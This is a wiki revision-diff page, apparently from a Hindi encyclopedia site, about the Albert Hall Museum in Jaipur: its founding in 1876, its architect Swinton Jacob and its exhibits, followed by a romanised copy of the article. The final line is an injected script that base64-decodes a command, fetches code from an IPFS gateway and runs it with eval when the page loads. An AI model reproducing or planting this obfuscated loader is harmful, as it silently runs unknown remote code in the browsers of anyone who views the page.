Difference between revisions of "अल्‍बर्ट हॉल संग्रहालय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(13 intermediate revisions by 4 users not shown)
Line 1: Line 1:
[[चित्र:Albert-Hall-Museum-Jaipur.jpg|thumb|250px|अल्‍बर्ट हॉल संग्रहालय, [[जयपुर]]<br /> Albert Hall Museum, Jaipur]]
+
{{सूचना बक्सा संग्रहालय
*शहर के सर्वाधिक सुन्‍दर उद्यान [[रामनिवास बाग़ जयपुर|रामनिवास बाग़]] में यह भवन निर्मित किया गया है।  
+
|चित्र=Albert-Hall-Museum-Jaipur-1.jpg
*रामनिवास बाग़ का निर्माण महाराजा [[सवाई रामसिंह]] ने अकाल राहत कार्यो के अन्‍तर्गत 4 लाख रू; की राशि व्‍यय कर करवाया था।  
+
|चित्र का नाम=अल्‍बर्ट हॉल संग्रहालय, जयपुर
*महाराजा सवाई रामसिंह ने ही 6 फ़रवरी, सन 1876 में [[ब्रिटेन]] के महाराजा एडवर्ड सप्‍तम प्रिन्स आफ वैल्‍स के रूप में [[भारत]] आने के समय यादगार के रूप में अल्‍बर्ट हाल का निर्माण प्रारम्‍भ किया।
+
|विवरण=अल्‍बर्ट हॉल संग्रहालय [[जयपुर]] शहर के सर्वाधिक सुन्‍दर उद्यान [[रामनिवास बाग़ जयपुर|रामनिवास बाग़]] में निर्मित किया गया है।
*वर्तमान में इस भवन को म्यूजियम का रुप दे दिया गया है।
+
|राज्य= [[राजस्थान]]
*भवन की वास्तुनियोजन सर स्विंटन जैकब द्वारा की गयी। [[भारतीय शैली|भारतीय]] [[फारसी शैली]] में बनी इस भव्‍य इमारत में इस समय [[संग्रहालय]] संचालित किया जा रहा है।  
+
|नगर= [[जयपुर]]
 +
|निर्माण=
 +
|स्थापना=[[6 फ़रवरी]], [[1876]] में महाराजा रामसिंह द्वारा स्थापित
 +
|भौगोलिक स्थिति=
 +
|मार्ग स्थिति=जयपुर अंतर्राष्ट्रीय हवाई अड्डे से लगभग 15 किमी की दूरी पर है।
 +
|प्रसिद्धि=
 +
|मानचित्र लिंक=[http://maps.google.co.in/maps?saddr=Sanganer+Airport,+Airport+Road,+Jagatpura,+Jaipur,+Rajasthan&daddr=Albert+Hall+Museum&hl=en&ll=26.877675,75.794334&spn=0.180985,0.363579&sll=26.841227,75.802917&sspn=0.090521,0.181789&geocode=FRFCmQEdgKGEBCGdtj3P39o9sA%3BFb-jmgEdJeqEBCFoaTwTM0O7BQ&oq=san+Airport&mra=ls&t=m&z=12 गूगल मानचित्र]
 +
|संबंधित लेख=
 +
|शीर्षक 1=वास्तुकार
 +
|पाठ 1=कर्नल एस. जैकब
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=महाराजा एडवर्ड सप्‍तम ''प्रिन्स ऑफ़ वैल्‍स'' के रूप में [[भारत]] आने के समय पर स्मृति के रूप में अल्‍बर्ट हॉल का निर्माण प्रारम्‍भ किया गया। वर्तमान में इस भवन को संग्रहालय का रूप दे दिया गया है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन={{अद्यतन|17:13, 7 मई 2012 (IST)}}
 +
}}
 +
'''अल्‍बर्ट हॉल संग्रहालय''' [[राजस्थान]] राज्य के [[जयपुर]] शहर के सर्वाधिक सुन्‍दर उद्यान [[रामनिवास बाग़ जयपुर|रामनिवास बाग़]] में निर्मित किया गया है।  
 +
*रामनिवास बाग़ का निर्माण महाराजा रामसिंह ने अकाल राहत कार्यो के अन्‍तर्गत 4 लाख रू. की राशि व्‍यय कर करवाया था।  
 +
*महाराजा रामसिंह ने ही [[6 फ़रवरी]], सन [[1876]] में [[ब्रिटेन]] के महाराजा एडवर्ड सप्‍तम ''प्रिन्स ऑफ़ वैल्‍स'' के रूप में [[भारत]] आने के समय पर स्मृति के रूप में अल्‍बर्ट हॉल का निर्माण प्रारम्‍भ किया गया। वर्तमान में इस भवन को संग्रहालय का रूप दे दिया गया है।
 +
*भवन की वास्तुनियोजन सर स्विंटन जैकब द्वारा की गयी। भारतीय व फ़ारसी शैली में बनी इस भव्‍य इमारत में इस समय संग्रहालय संचालित किया जा रहा है।  
 
*अल्बर्ट हाल देश की एकमात्र ऐसी इमारत है, जिसमें कई देशों की स्थापत्य शैली का समावेश देखने को मिलता है।  
 
*अल्बर्ट हाल देश की एकमात्र ऐसी इमारत है, जिसमें कई देशों की स्थापत्य शैली का समावेश देखने को मिलता है।  
*इमारत के वास्तुकार कर्नल एस. जैकब ने दुनिया के म्यूजियमों की जानकारी लेकर बनवाया था।  
+
*इमारत के वास्तुकार कर्नल एस. जैकब ने दुनिया के संग्रहालयों की जानकारी लेकर बनवाया था।  
*इस भवन में प्रवेश करते हुए एक हाल है जिसमें जयपुर के राजाओं के चित्र व राजचिन्ह हैं।  
+
*इस भवन में प्रवेश करते हुए एक हाल है जिसमें जयपुर के राजाओं के चित्र व राजचिह्न हैं।  
 
*चारों तरफ भारतीय व विदेशी कला के नमूनों की प्रतिकृतियाँ व भित्ति चित्र हैं।
 
*चारों तरफ भारतीय व विदेशी कला के नमूनों की प्रतिकृतियाँ व भित्ति चित्र हैं।
 +
[[चित्र:Albert-Hall-Museum-Jaipur.jpg|thumb|250px|left|अल्‍बर्ट हॉल संग्रहालय, [[जयपुर]]]]
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=
Line 18: Line 38:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}
 +
{{संग्रहालय}}
 
[[Category:जयपुर के पर्यटन स्थल]]
 
[[Category:जयपुर के पर्यटन स्थल]]
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान]]
 
[[Category:पर्यटन कोश]]
 
[[Category:पर्यटन कोश]]
 
[[Category:संग्रहालय कोश]]
 
[[Category:संग्रहालय कोश]]
 +
[[Category:संग्रहालय]]
 +
[[Category:जयपुर]]
 
__INDEX__
 
__INDEX__

Latest revision as of 09:06, 8 August 2012

alh‍bart h aaul sangrahalay
vivaran alh‍bart h aaul sangrahalay jayapur shahar ke sarvadhik sunh‍dar udyan ramanivas bag mean nirmit kiya gaya hai.
rajy rajasthan
nagar jayapur
sthapana 6 faravari, 1876 mean maharaja ramasianh dvara sthapit
marg sthiti jayapur aantarrashtriy havaee adde se lagabhag 15 kimi ki doori par hai.
chitr:Map-icon.gif googal manachitr
vastukar karnal es. jaikab
any janakari maharaja edavard saph‍tam prins aauf vailh‍s ke roop mean bharat ane ke samay par smriti ke roop mean alh‍bart h aaul ka nirman praramh‍bh kiya gaya. vartaman mean is bhavan ko sangrahalay ka roop de diya gaya hai.
adyatan‎

alh‍bart h aaul sangrahalay rajasthan rajy ke jayapur shahar ke sarvadhik sunh‍dar udyan ramanivas bag mean nirmit kiya gaya hai.

  • ramanivas bag ka nirman maharaja ramasianh ne akal rahat karyo ke anh‍targat 4 lakh roo. ki rashi vh‍yay kar karavaya tha.
  • maharaja ramasianh ne hi 6 faravari, san 1876 mean briten ke maharaja edavard saph‍tam prins aauf vailh‍s ke roop mean bharat ane ke samay par smriti ke roop mean alh‍bart h aaul ka nirman praramh‍bh kiya gaya. vartaman mean is bhavan ko sangrahalay ka roop de diya gaya hai.
  • bhavan ki vastuniyojan sar sviantan jaikab dvara ki gayi. bharatiy v farasi shaili mean bani is bhavh‍y imarat mean is samay sangrahalay sanchalit kiya ja raha hai.
  • albart hal desh ki ekamatr aisi imarat hai, jisamean kee deshoan ki sthapaty shaili ka samavesh dekhane ko milata hai.
  • imarat ke vastukar karnal es. jaikab ne duniya ke sangrahalayoan ki janakari lekar banavaya tha.
  • is bhavan mean pravesh karate hue ek hal hai jisamean jayapur ke rajaoan ke chitr v rajachihn haian.
  • charoan taraph bharatiy v videshi kala ke namoonoan ki pratikritiyaan v bhitti chitr haian.

[[chitr:Albert-Hall-Museum-Jaipur.jpg|thumb|250px|left|alh‍bart h aaul sangrahalay, jayapur]]

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>